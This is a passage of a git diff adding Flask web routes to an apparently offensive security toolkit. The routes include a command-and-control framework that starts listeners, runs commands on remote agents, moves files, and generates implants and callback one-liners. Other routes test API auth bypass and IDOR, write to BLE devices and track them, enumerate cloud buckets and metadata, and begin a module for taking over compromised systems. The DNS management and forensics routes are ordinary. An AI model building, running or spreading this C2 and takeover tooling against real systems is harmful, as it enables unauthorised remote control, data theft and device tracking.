+@api_fuzzer_bp.route('/openapi', methods=['POST']) +@login_required +def parse_openapi(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().parse_openapi(data.get('url', ''))) + +@api_fuzzer_bp.route('/fuzz', methods=['POST']) +@login_required +def fuzz(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().fuzz_params( + url=data.get('url', ''), + method=data.get('method', 'GET'), + params=data.get('params', {}), + payload_type=data.get('payload_type', 'type_confusion') + )) + +@api_fuzzer_bp.route('/auth/bypass', methods=['POST']) +@login_required +def auth_bypass(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().test_auth_bypass(data.get('url', ''))) + +@api_fuzzer_bp.route('/auth/idor', methods=['POST']) +@login_required +def idor(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().test_idor( + data.get('url_template', ''), + (data.get('start_id', 1), data.get('end_id', 10)), + data.get('auth_token') + )) + +@api_fuzzer_bp.route('/ratelimit', methods=['POST']) +@login_required +def rate_limit(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().test_rate_limit( + data.get('url', ''), data.get('count', 50), data.get('method', 'GET') + )) + +@api_fuzzer_bp.route('/graphql/introspect', methods=['POST']) +@login_required +def graphql_introspect(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().graphql_introspect(data.get('url', ''))) + +@api_fuzzer_bp.route('/graphql/depth', methods=['POST']) +@login_required +def graphql_depth(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().graphql_depth_test(data.get('url', ''), data.get('max_depth', 10))) + +@api_fuzzer_bp.route('/analyze', methods=['POST']) +@login_required +def analyze(): + data = request.get_json(silent=True) or {} + return jsonify(_get_fuzzer().analyze_response(data.get('url', ''), data.get('method', 'GET'))) + +@api_fuzzer_bp.route('/auth/set', methods=['POST']) +@login_required +def set_auth(): + data = request.get_json(silent=True) or {} + _get_fuzzer().set_auth(data.get('type', ''), data.get('value', ''), data.get('header', 'Authorization')) + return jsonify({'ok': True}) + +@api_fuzzer_bp.route('/job/') +@login_required +def job_status(job_id): + job = _get_fuzzer().get_job(job_id) + return jsonify(job or {'error': 'Job not found'}) diff --git a/web/routes/ble_scanner.py b/web/routes/ble_scanner.py new file mode 100644 index 0000000..8c785c3 --- /dev/null +++ b/web/routes/ble_scanner.py @@ -0,0 +1,76 @@ +"""BLE Scanner routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +ble_scanner_bp = Blueprint('ble_scanner', __name__, url_prefix='/ble') + +def _get_scanner(): + from modules.ble_scanner import get_ble_scanner + return get_ble_scanner() + +@ble_scanner_bp.route('/') +@login_required +def index(): + return render_template('ble_scanner.html') + +@ble_scanner_bp.route('/status') +@login_required +def status(): + return jsonify(_get_scanner().get_status()) + +@ble_scanner_bp.route('/scan', methods=['POST']) +@login_required +def scan(): + data = request.get_json(silent=True) or {} + return jsonify(_get_scanner().scan(data.get('duration', 10.0))) + +@ble_scanner_bp.route('/devices') +@login_required +def devices(): + return jsonify(_get_scanner().get_devices()) + +@ble_scanner_bp.route('/device/
') +@login_required +def device_detail(address): + return jsonify(_get_scanner().get_device_detail(address)) + +@ble_scanner_bp.route('/read', methods=['POST']) +@login_required +def read_char(): + data = request.get_json(silent=True) or {} + return jsonify(_get_scanner().read_characteristic(data.get('address', ''), data.get('uuid', ''))) + +@ble_scanner_bp.route('/write', methods=['POST']) +@login_required +def write_char(): + data = request.get_json(silent=True) or {} + value = bytes.fromhex(data.get('data_hex', '')) if data.get('data_hex') else data.get('data', '').encode() + return jsonify(_get_scanner().write_characteristic(data.get('address', ''), data.get('uuid', ''), value)) + +@ble_scanner_bp.route('/vulnscan', methods=['POST']) +@login_required +def vuln_scan(): + data = request.get_json(silent=True) or {} + return jsonify(_get_scanner().vuln_scan(data.get('address'))) + +@ble_scanner_bp.route('/track', methods=['POST']) +@login_required +def track(): + data = request.get_json(silent=True) or {} + return jsonify(_get_scanner().track_device(data.get('address', ''))) + +@ble_scanner_bp.route('/track/
/history') +@login_required +def tracking_history(address): + return jsonify(_get_scanner().get_tracking_history(address)) + +@ble_scanner_bp.route('/scan/save', methods=['POST']) +@login_required +def save_scan(): + data = request.get_json(silent=True) or {} + return jsonify(_get_scanner().save_scan(data.get('name'))) + +@ble_scanner_bp.route('/scans') +@login_required +def list_scans(): + return jsonify(_get_scanner().list_scans()) diff --git a/web/routes/c2_framework.py b/web/routes/c2_framework.py new file mode 100644 index 0000000..3bf6496 --- /dev/null +++ b/web/routes/c2_framework.py @@ -0,0 +1,134 @@ +"""C2 Framework — web routes for command & control.""" + +from flask import Blueprint, render_template, request, jsonify, Response +from web.auth import login_required + +c2_framework_bp = Blueprint('c2_framework', __name__) + + +def _svc(): + from modules.c2_framework import get_c2_server + return get_c2_server() + + +@c2_framework_bp.route('/c2/') +@login_required +def index(): + return render_template('c2_framework.html') + + +# ── Listeners ───────────────────────────────────────────────────────────────── + +@c2_framework_bp.route('/c2/listeners', methods=['GET']) +@login_required +def list_listeners(): + return jsonify({'ok': True, 'listeners': _svc().list_listeners()}) + + +@c2_framework_bp.route('/c2/listeners', methods=['POST']) +@login_required +def start_listener(): + data = request.get_json(silent=True) or {} + return jsonify(_svc().start_listener( + name=data.get('name', 'default'), + host=data.get('host', '0.0.0.0'), + port=data.get('port', 4444), + )) + + +@c2_framework_bp.route('/c2/listeners/', methods=['DELETE']) +@login_required +def stop_listener(name): + return jsonify(_svc().stop_listener(name)) + + +# ── Agents ──────────────────────────────────────────────────────────────────── + +@c2_framework_bp.route('/c2/agents', methods=['GET']) +@login_required +def list_agents(): + return jsonify({'ok': True, 'agents': _svc().list_agents()}) + + +@c2_framework_bp.route('/c2/agents/', methods=['DELETE']) +@login_required +def remove_agent(agent_id): + return jsonify(_svc().remove_agent(agent_id)) + + +# ── Tasks ───────────────────────────────────────────────────────────────────── + +@c2_framework_bp.route('/c2/agents//exec', methods=['POST']) +@login_required +def exec_command(agent_id): + data = request.get_json(silent=True) or {} + command = data.get('command', '') + if not command: + return jsonify({'ok': False, 'error': 'No command'}) + return jsonify(_svc().execute_command(agent_id, command)) + + +@c2_framework_bp.route('/c2/agents//download', methods=['POST']) +@login_required +def download_file(agent_id): + data = request.get_json(silent=True) or {} + path = data.get('path', '') + if not path: + return jsonify({'ok': False, 'error': 'No path'}) + return jsonify(_svc().download_file(agent_id, path)) + + +@c2_framework_bp.route('/c2/agents//upload', methods=['POST']) +@login_required +def upload_file(agent_id): + f = request.files.get('file') + data = request.form + path = data.get('path', '') + if not f or not path: + return jsonify({'ok': False, 'error': 'File and path required'}) + return jsonify(_svc().upload_file(agent_id, path, f.read())) + + +@c2_framework_bp.route('/c2/tasks/', methods=['GET']) +@login_required +def task_result(task_id): + return jsonify(_svc().get_task_result(task_id)) + + +@c2_framework_bp.route('/c2/tasks', methods=['GET']) +@login_required +def list_tasks(): + agent_id = request.args.get('agent_id', '') + return jsonify({'ok': True, 'tasks': _svc().list_tasks(agent_id)}) + + +# ── Agent Generation ────────────────────────────────────────────────────────── + +@c2_framework_bp.route('/c2/generate', methods=['POST']) +@login_required +def generate_agent(): + data = request.get_json(silent=True) or {} + host = data.get('host', '').strip() + if not host: + return jsonify({'ok': False, 'error': 'Callback host required'}) + result = _svc().generate_agent( + host=host, + port=data.get('port', 4444), + agent_type=data.get('type', 'python'), + interval=data.get('interval', 5), + jitter=data.get('jitter', 2), + ) + # Don't send filepath in API response + result.pop('filepath', None) + return jsonify(result) + + +@c2_framework_bp.route('/c2/oneliner', methods=['POST']) +@login_required +def get_oneliner(): + data = request.get_json(silent=True) or {} + host = data.get('host', '').strip() + if not host: + return jsonify({'ok': False, 'error': 'Host required'}) + return jsonify(_svc().get_oneliner(host, data.get('port', 4444), + data.get('type', 'python'))) diff --git a/web/routes/cloud_scan.py b/web/routes/cloud_scan.py new file mode 100644 index 0000000..ef115ca --- /dev/null +++ b/web/routes/cloud_scan.py @@ -0,0 +1,60 @@ +"""Cloud Security Scanner routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +cloud_scan_bp = Blueprint('cloud_scan', __name__, url_prefix='/cloud') + +def _get_scanner(): + from modules.cloud_scan import get_cloud_scanner + return get_cloud_scanner() + +@cloud_scan_bp.route('/') +@login_required +def index(): + return render_template('cloud_scan.html') + +@cloud_scan_bp.route('/s3/enum', methods=['POST']) +@login_required +def s3_enum(): + data = request.get_json(silent=True) or {} + job_id = _get_scanner().enum_s3_buckets( + data.get('keyword', ''), data.get('prefixes'), data.get('suffixes') + ) + return jsonify({'ok': bool(job_id), 'job_id': job_id}) + +@cloud_scan_bp.route('/gcs/enum', methods=['POST']) +@login_required +def gcs_enum(): + data = request.get_json(silent=True) or {} + job_id = _get_scanner().enum_gcs_buckets(data.get('keyword', '')) + return jsonify({'ok': bool(job_id), 'job_id': job_id}) + +@cloud_scan_bp.route('/azure/enum', methods=['POST']) +@login_required +def azure_enum(): + data = request.get_json(silent=True) or {} + job_id = _get_scanner().enum_azure_blobs(data.get('keyword', '')) + return jsonify({'ok': bool(job_id), 'job_id': job_id}) + +@cloud_scan_bp.route('/services', methods=['POST']) +@login_required +def exposed_services(): + data = request.get_json(silent=True) or {} + return jsonify(_get_scanner().scan_exposed_services(data.get('target', ''))) + +@cloud_scan_bp.route('/metadata') +@login_required +def metadata(): + return jsonify(_get_scanner().check_metadata_access()) + +@cloud_scan_bp.route('/subdomains', methods=['POST']) +@login_required +def subdomains(): + data = request.get_json(silent=True) or {} + return jsonify(_get_scanner().enum_cloud_subdomains(data.get('domain', ''))) + +@cloud_scan_bp.route('/job/') +@login_required +def job_status(job_id): + job = _get_scanner().get_job(job_id) + return jsonify(job or {'error': 'Job not found'}) diff --git a/web/routes/dns_service.py b/web/routes/dns_service.py new file mode 100644 index 0000000..efc18b1 --- /dev/null +++ b/web/routes/dns_service.py @@ -0,0 +1,691 @@ +"""DNS Service web routes — manage the Go-based DNS server from the dashboard.""" + +from flask import Blueprint, render_template, request, jsonify +from web.auth import login_required + +dns_service_bp = Blueprint('dns_service', __name__, url_prefix='/dns') + + +def _mgr(): + from core.dns_service import get_dns_service + return get_dns_service() + + +@dns_service_bp.route('/') +@login_required +def index(): + return render_template('dns_service.html') + + +@dns_service_bp.route('/nameserver') +@login_required +def nameserver(): + return render_template('dns_nameserver.html') + + +@dns_service_bp.route('/network-info') +@login_required +def network_info(): + """Auto-detect local network info for EZ-Local setup.""" + import socket + import subprocess as sp + info = {'ok': True} + + # Hostname + info['hostname'] = socket.gethostname() + try: + info['fqdn'] = socket.getfqdn() + except Exception: + info['fqdn'] = info['hostname'] + + # Local IPs + local_ips = [] + try: + # Connect to external to find default route IP + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(('8.8.8.8', 53)) + default_ip = s.getsockname()[0] + s.close() + info['default_ip'] = default_ip + except Exception: + info['default_ip'] = '127.0.0.1' + + # Gateway detection + try: + r = sp.run(['ip', 'route', 'show', 'default'], capture_output=True, text=True, timeout=5) + if r.stdout: + parts = r.stdout.split() + if 'via' in parts: + info['gateway'] = parts[parts.index('via') + 1] + except Exception: + pass + if 'gateway' not in info: + try: + # Windows: parse ipconfig or route print + r = sp.run(['route', 'print', '0.0.0.0'], capture_output=True, text=True, timeout=5) + for line in r.stdout.splitlines(): + parts = line.split() + if len(parts) >= 3 and parts[0] == '0.0.0.0': + info['gateway'] = parts[2] + break + except Exception: + info['gateway'] = '' + + # Subnet guess from default IP + ip = info.get('default_ip', '') + if ip and ip != '127.0.0.1': + parts = ip.split('.') + if len(parts) == 4: + info['subnet'] = f"{parts[0]}.{parts[1]}.{parts[2]}.0/24" + info['network_prefix'] = f"{parts[0]}.{parts[1]}.{parts[2]}" + + # ARP table for existing hosts + hosts = [] + try: + r = sp.run(['arp', '-a'], capture_output=True, text=True, timeout=10) + for line in r.stdout.splitlines(): + # Parse arp output (Windows: " 192.168.1.1 00-aa-bb-cc-dd-ee dynamic") + parts = line.split() + if len(parts) >= 2: + candidate = parts[0].strip() + if candidate.count('.') == 3 and not candidate.startswith('224.') and not candidate.startswith('255.'): + try: + socket.inet_aton(candidate) + mac = parts[1] if len(parts) >= 2 else '' + # Try reverse DNS + try: + name = socket.gethostbyaddr(candidate)[0] + except Exception: + name = '' + hosts.append({'ip': candidate, 'mac': mac, 'name': name}) + except Exception: + pass + except Exception: + pass + info['hosts'] = hosts[:50] # Limit + + return jsonify(info) + + +@dns_service_bp.route('/nameserver/binary-info') +@login_required +def binary_info(): + """Get info about the Go nameserver binary.""" + mgr = _mgr() + binary = mgr.find_binary() + info = { + 'ok': True, + 'found': binary is not None, + 'path': binary, + 'running': mgr.is_running(), + 'pid': mgr._pid, + 'config_path': mgr._config_path, + 'listen_dns': mgr._config.get('listen_dns', ''), + 'listen_api': mgr._config.get('listen_api', ''), + 'upstream': mgr._config.get('upstream', []), + } + if binary: + import subprocess as sp + try: + r = sp.run([binary, '-version'], capture_output=True, text=True, timeout=5) + info['version'] = r.stdout.strip() or r.stderr.strip() + except Exception: + info['version'] = 'unknown' + return jsonify(info) + + +@dns_service_bp.route('/nameserver/query', methods=['POST']) +@login_required +def query_test(): + """Resolve a DNS name using the running nameserver (or system resolver).""" + import socket + import subprocess as sp + data = request.get_json(silent=True) or {} + name = data.get('name', '').strip() + qtype = data.get('type', 'A').upper() + use_local = data.get('use_local', True) + + if not name: + return jsonify({'ok': False, 'error': 'Name required'}) + + mgr = _mgr() + listen = mgr._config.get('listen_dns', '0.0.0.0:53') + host, port = (listen.rsplit(':', 1) + ['53'])[:2] + if host in ('0.0.0.0', '::'): + host = '127.0.0.1' + + results = [] + + # Try nslookup / dig + try: + if use_local and mgr.is_running(): + cmd = ['nslookup', '-type=' + qtype, name, host] + else: + cmd = ['nslookup', '-type=' + qtype, name] + r = sp.run(cmd, capture_output=True, text=True, timeout=10) + raw = r.stdout + r.stderr + results.append({'method': 'nslookup', 'output': raw.strip(), 'cmd': ' '.join(cmd)}) + except FileNotFoundError: + pass + except Exception as e: + results.append({'method': 'nslookup', 'output': str(e), 'cmd': ''}) + + # Python socket fallback for A records + if qtype == 'A': + try: + addrs = socket.getaddrinfo(name, None, socket.AF_INET) + ips = list(set(a[4][0] for a in addrs)) + results.append({'method': 'socket', 'output': ', '.join(ips) if ips else 'No results', 'cmd': f'getaddrinfo({name})'}) + except socket.gaierror as e: + results.append({'method': 'socket', 'output': str(e), 'cmd': f'getaddrinfo({name})'}) + + return jsonify({'ok': True, 'name': name, 'type': qtype, 'results': results}) + + +@dns_service_bp.route('/status') +@login_required +def status(): + return jsonify(_mgr().status()) + + +@dns_service_bp.route('/start', methods=['POST']) +@login_required +def start(): + return jsonify(_mgr().start()) + + +@dns_service_bp.route('/stop', methods=['POST']) +@login_required +def stop(): + return jsonify(_mgr().stop()) + + +@dns_service_bp.route('/config', methods=['GET']) +@login_required +def get_config(): + return jsonify({'ok': True, 'config': _mgr().get_config()}) + + +@dns_service_bp.route('/config', methods=['PUT']) +@login_required +def update_config(): + data = request.get_json(silent=True) or {} + return jsonify(_mgr().update_config(data)) + + +@dns_service_bp.route('/zones', methods=['GET']) +@login_required +def list_zones(): + try: + zones = _mgr().list_zones() + return jsonify({'ok': True, 'zones': zones}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones', methods=['POST']) +@login_required +def create_zone(): + data = request.get_json(silent=True) or {} + domain = data.get('domain', '').strip() + if not domain: + return jsonify({'ok': False, 'error': 'Domain required'}) + try: + return jsonify(_mgr().create_zone(domain)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones/', methods=['GET']) +@login_required +def get_zone(domain): + try: + return jsonify(_mgr().get_zone(domain)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones/', methods=['DELETE']) +@login_required +def delete_zone(domain): + try: + return jsonify(_mgr().delete_zone(domain)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones//records', methods=['GET']) +@login_required +def list_records(domain): + try: + records = _mgr().list_records(domain) + return jsonify({'ok': True, 'records': records}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones//records', methods=['POST']) +@login_required +def add_record(domain): + data = request.get_json(silent=True) or {} + try: + return jsonify(_mgr().add_record( + domain, + rtype=data.get('type', 'A'), + name=data.get('name', ''), + value=data.get('value', ''), + ttl=int(data.get('ttl', 300)), + priority=int(data.get('priority', 0)), + )) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones//records/', methods=['DELETE']) +@login_required +def delete_record(domain, record_id): + try: + return jsonify(_mgr().delete_record(domain, record_id)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones//mail-setup', methods=['POST']) +@login_required +def mail_setup(domain): + data = request.get_json(silent=True) or {} + try: + return jsonify(_mgr().setup_mail_records( + domain, + mx_host=data.get('mx_host', ''), + dkim_key=data.get('dkim_key', ''), + spf_allow=data.get('spf_allow', ''), + )) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones//dnssec/enable', methods=['POST']) +@login_required +def dnssec_enable(domain): + try: + return jsonify(_mgr().enable_dnssec(domain)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zones//dnssec/disable', methods=['POST']) +@login_required +def dnssec_disable(domain): + try: + return jsonify(_mgr().disable_dnssec(domain)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/metrics') +@login_required +def metrics(): + try: + return jsonify({'ok': True, 'metrics': _mgr().get_metrics()}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +# ── New Go API proxies ──────────────────────────────────────────────── + +def _proxy_get(endpoint): + try: + return jsonify(_mgr()._api_get(endpoint)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +def _proxy_post(endpoint, data=None): + try: + return jsonify(_mgr()._api_post(endpoint, data)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +def _proxy_delete(endpoint): + try: + return jsonify(_mgr()._api_delete(endpoint)) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/querylog') +@login_required +def querylog(): + limit = request.args.get('limit', '200') + return _proxy_get(f'/api/querylog?limit={limit}') + + +@dns_service_bp.route('/querylog', methods=['DELETE']) +@login_required +def clear_querylog(): + return _proxy_delete('/api/querylog') + + +@dns_service_bp.route('/cache') +@login_required +def cache_list(): + return _proxy_get('/api/cache') + + +@dns_service_bp.route('/cache', methods=['DELETE']) +@login_required +def cache_flush(): + key = request.args.get('key', '') + if key: + return _proxy_delete(f'/api/cache?key={key}') + return _proxy_delete('/api/cache') + + +@dns_service_bp.route('/blocklist') +@login_required +def blocklist_list(): + return _proxy_get('/api/blocklist') + + +@dns_service_bp.route('/blocklist', methods=['POST']) +@login_required +def blocklist_add(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/blocklist', data) + + +@dns_service_bp.route('/blocklist', methods=['DELETE']) +@login_required +def blocklist_remove(): + data = request.get_json(silent=True) or {} + try: + return jsonify(_mgr()._api_urllib('/api/blocklist', 'DELETE', data) + if not __import__('importlib').util.find_spec('requests') + else _mgr()._api_delete_with_body('/api/blocklist', data)) + except Exception: + # Fallback: use POST with _method override or direct urllib + import json as _json + import urllib.request + mgr = _mgr() + url = f'{mgr.api_base}/api/blocklist' + body = _json.dumps(data).encode() + req = urllib.request.Request(url, data=body, method='DELETE', + headers={'Authorization': f'Bearer {mgr.api_token}', + 'Content-Type': 'application/json'}) + try: + with urllib.request.urlopen(req, timeout=5) as resp: + return jsonify(_json.loads(resp.read())) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/stats/top-domains') +@login_required +def top_domains(): + limit = request.args.get('limit', '50') + return _proxy_get(f'/api/stats/top-domains?limit={limit}') + + +@dns_service_bp.route('/stats/query-types') +@login_required +def query_types(): + return _proxy_get('/api/stats/query-types') + + +@dns_service_bp.route('/stats/clients') +@login_required +def client_stats(): + return _proxy_get('/api/stats/clients') + + +@dns_service_bp.route('/resolver/ns-cache') +@login_required +def ns_cache(): + return _proxy_get('/api/resolver/ns-cache') + + +@dns_service_bp.route('/resolver/ns-cache', methods=['DELETE']) +@login_required +def flush_ns_cache(): + return _proxy_delete('/api/resolver/ns-cache') + + +@dns_service_bp.route('/rootcheck') +@login_required +def rootcheck(): + return _proxy_get('/api/rootcheck') + + +@dns_service_bp.route('/benchmark', methods=['POST']) +@login_required +def benchmark(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/benchmark', data) + + +@dns_service_bp.route('/forwarding') +@login_required +def forwarding_list(): + return _proxy_get('/api/forwarding') + + +@dns_service_bp.route('/forwarding', methods=['POST']) +@login_required +def forwarding_add(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/forwarding', data) + + +@dns_service_bp.route('/forwarding', methods=['DELETE']) +@login_required +def forwarding_remove(): + data = request.get_json(silent=True) or {} + try: + import json as _json, urllib.request + mgr = _mgr() + url = f'{mgr.api_base}/api/forwarding' + body = _json.dumps(data).encode() + req = urllib.request.Request(url, data=body, method='DELETE', + headers={'Authorization': f'Bearer {mgr.api_token}', + 'Content-Type': 'application/json'}) + with urllib.request.urlopen(req, timeout=5) as resp: + return jsonify(_json.loads(resp.read())) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/zone-export/') +@login_required +def zone_export(domain): + return _proxy_get(f'/api/zone-export/{domain}') + + +@dns_service_bp.route('/zone-import/', methods=['POST']) +@login_required +def zone_import(domain): + data = request.get_json(silent=True) or {} + return _proxy_post(f'/api/zone-import/{domain}', data) + + +@dns_service_bp.route('/zone-clone', methods=['POST']) +@login_required +def zone_clone(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/zone-clone', data) + + +@dns_service_bp.route('/zone-bulk-records/', methods=['POST']) +@login_required +def bulk_records(domain): + data = request.get_json(silent=True) or {} + return _proxy_post(f'/api/zone-bulk-records/{domain}', data) + + +# ── Hosts file management ──────────────────────────────────────────── + +@dns_service_bp.route('/hosts') +@login_required +def hosts_list(): + return _proxy_get('/api/hosts') + + +@dns_service_bp.route('/hosts', methods=['POST']) +@login_required +def hosts_add(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/hosts', data) + + +@dns_service_bp.route('/hosts', methods=['DELETE']) +@login_required +def hosts_remove(): + data = request.get_json(silent=True) or {} + try: + import json as _json, urllib.request + mgr = _mgr() + url = f'{mgr.api_base}/api/hosts' + body = _json.dumps(data).encode() + req_obj = urllib.request.Request(url, data=body, method='DELETE', + headers={'Authorization': f'Bearer {mgr.api_token}', + 'Content-Type': 'application/json'}) + with urllib.request.urlopen(req_obj, timeout=5) as resp: + return jsonify(_json.loads(resp.read())) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@dns_service_bp.route('/hosts/import', methods=['POST']) +@login_required +def hosts_import(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/hosts/import', data) + + +@dns_service_bp.route('/hosts/export') +@login_required +def hosts_export(): + return _proxy_get('/api/hosts/export') + + +# ── Encryption (DoT / DoH) ────────────────────────────────────────── + +@dns_service_bp.route('/encryption') +@login_required +def encryption_status(): + return _proxy_get('/api/encryption') + + +@dns_service_bp.route('/encryption', methods=['PUT', 'POST']) +@login_required +def encryption_update(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/encryption', data) + + +@dns_service_bp.route('/encryption/test', methods=['POST']) +@login_required +def encryption_test(): + data = request.get_json(silent=True) or {} + return _proxy_post('/api/encryption/test', data) + + +# ── EZ Intranet Domain ────────────────────────────────────────────── + +@dns_service_bp.route('/ez-intranet', methods=['POST']) +@login_required +def ez_intranet(): + """One-click intranet domain setup. Creates zone + host records + reverse zone.""" + import socket + data = request.get_json(silent=True) or {} + domain = data.get('domain', '').strip() + if not domain: + return jsonify({'ok': False, 'error': 'Domain name required'}) + + mgr = _mgr() + results = {'ok': True, 'domain': domain, 'steps': []} + + # Detect local network info + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(('8.8.8.8', 53)) + local_ip = s.getsockname()[0] + s.close() + except Exception: + local_ip = '127.0.0.1' + + hostname = socket.gethostname() + + # Step 1: Create the zone + try: + r = mgr.create_zone(domain) + results['steps'].append({'step': 'Create zone', 'ok': r.get('ok', False)}) + except Exception as e: + results['steps'].append({'step': 'Create zone', 'ok': False, 'error': str(e)}) + + # Step 2: Add server record (ns.domain -> local IP) + records = [ + {'type': 'A', 'name': f'ns.{domain}.', 'value': local_ip, 'ttl': 3600}, + {'type': 'A', 'name': f'{domain}.', 'value': local_ip, 'ttl': 3600}, + {'type': 'A', 'name': f'{hostname}.{domain}.', 'value': local_ip, 'ttl': 3600}, + ] + + # Add custom hosts from request + for host in data.get('hosts', []): + ip = host.get('ip', '').strip() + name = host.get('name', '').strip() + if ip and name: + if not name.endswith('.'): + name = f'{name}.{domain}.' + records.append({'type': 'A', 'name': name, 'value': ip, 'ttl': 3600}) + + for rec in records: + try: + r = mgr.add_record(domain, rtype=rec['type'], name=rec['name'], + value=rec['value'], ttl=rec['ttl']) + results['steps'].append({'step': f'Add {rec["name"]} -> {rec["value"]}', 'ok': r.get('ok', False)}) + except Exception as e: + results['steps'].append({'step': f'Add {rec["name"]}', 'ok': False, 'error': str(e)}) + + # Step 3: Add hosts file entries too for immediate local resolution + try: + import json as _json, urllib.request + hosts_entries = [ + {'ip': local_ip, 'hostname': domain, 'aliases': [hostname + '.' + domain]}, + ] + for host in data.get('hosts', []): + ip = host.get('ip', '').strip() + name = host.get('name', '').strip() + if ip and name: + hosts_entries.append({'ip': ip, 'hostname': name + '.' + domain if '.' not in name else name}) + + for entry in hosts_entries: + body = _json.dumps(entry).encode() + url = f'{mgr.api_base}/api/hosts' + req_obj = urllib.request.Request(url, data=body, method='POST', + headers={'Authorization': f'Bearer {mgr.api_token}', + 'Content-Type': 'application/json'}) + urllib.request.urlopen(req_obj, timeout=5) + results['steps'].append({'step': 'Add hosts entries', 'ok': True}) + except Exception as e: + results['steps'].append({'step': 'Add hosts entries', 'ok': False, 'error': str(e)}) + + # Step 4: Create reverse zone if requested + if data.get('reverse_zone', True): + parts = local_ip.split('.') + if len(parts) == 4: + rev_zone = f'{parts[2]}.{parts[1]}.{parts[0]}.in-addr.arpa' + try: + mgr.create_zone(rev_zone) + # Add PTR for server + mgr.add_record(rev_zone, rtype='PTR', + name=f'{parts[3]}.{rev_zone}.', + value=f'{hostname}.{domain}.', ttl=3600) + results['steps'].append({'step': f'Create reverse zone {rev_zone}', 'ok': True}) + except Exception as e: + results['steps'].append({'step': 'Create reverse zone', 'ok': False, 'error': str(e)}) + + results['local_ip'] = local_ip + results['hostname'] = hostname + return jsonify(results) diff --git a/web/routes/forensics.py b/web/routes/forensics.py new file mode 100644 index 0000000..4a4900b --- /dev/null +++ b/web/routes/forensics.py @@ -0,0 +1,71 @@ +"""Forensics Toolkit routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +forensics_bp = Blueprint('forensics', __name__, url_prefix='/forensics') + +def _get_engine(): + from modules.forensics import get_forensics + return get_forensics() + +@forensics_bp.route('/') +@login_required +def index(): + return render_template('forensics.html') + +@forensics_bp.route('/hash', methods=['POST']) +@login_required +def hash_file(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().hash_file(data.get('file', ''), data.get('algorithms'))) + +@forensics_bp.route('/verify', methods=['POST']) +@login_required +def verify_hash(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().verify_hash( + data.get('file', ''), data.get('hash', ''), data.get('algorithm') + )) + +@forensics_bp.route('/image', methods=['POST']) +@login_required +def create_image(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().create_image(data.get('source', ''), data.get('output'))) + +@forensics_bp.route('/carve', methods=['POST']) +@login_required +def carve_files(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().carve_files( + data.get('source', ''), data.get('file_types'), data.get('max_files', 100) + )) + +@forensics_bp.route('/metadata', methods=['POST']) +@login_required +def extract_metadata(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().extract_metadata(data.get('file', ''))) + +@forensics_bp.route('/timeline', methods=['POST']) +@login_required +def build_timeline(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().build_timeline( + data.get('directory', ''), data.get('recursive', True), data.get('max_entries', 10000) + )) + +@forensics_bp.route('/evidence') +@login_required +def list_evidence(): + return jsonify(_get_engine().list_evidence()) + +@forensics_bp.route('/carved') +@login_required +def list_carved(): + return jsonify(_get_engine().list_carved()) + +@forensics_bp.route('/custody') +@login_required +def custody_log(): + return jsonify(_get_engine().get_custody_log()) diff --git a/web/routes/hack_hijack.py b/web/routes/hack_hijack.py new file mode 100644 index 0000000..1f73663 --- /dev/null +++ b/web/routes/hack_hijack.py @@ -0,0 +1,139 @@ +"""Hack Hijack — web routes for scanning and taking over compromised systems.""" + +import threading +import uuid +from flask import Blueprint, render_template, request, jsonify, Response +from web.auth import login_required + +hack_hijack_bp = Blueprint('hack_hijack', __name__) + +# Running scans keyed by job_id +_running_scans: dict = {} + + +def _svc(): + from modules.hack_hijack import get_hack_hijack + return get_hack_hijack() + + +# ── UI ──────────────────────────────────────────────────────────────────────── + +@hack_hijack_bp.route('/hack-hijack/') +@login_required +def index(): + return render_template('hack_hijack.html') + + +# ── Scanning ────────────────────────────────────────────────────────────────── + 